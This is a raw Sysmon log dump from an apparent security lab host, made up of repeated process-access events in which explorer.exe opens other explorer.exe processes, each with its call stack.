16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244463Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244462Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244461Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244460Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244459Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244458Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244457Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244456Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244455Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244454Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244453Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244452Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244451Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244450Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244449Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244448Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244447Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244446Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244445Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244444Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244443Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244442Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244441Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244440Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244439Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244438Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244437Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244436Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 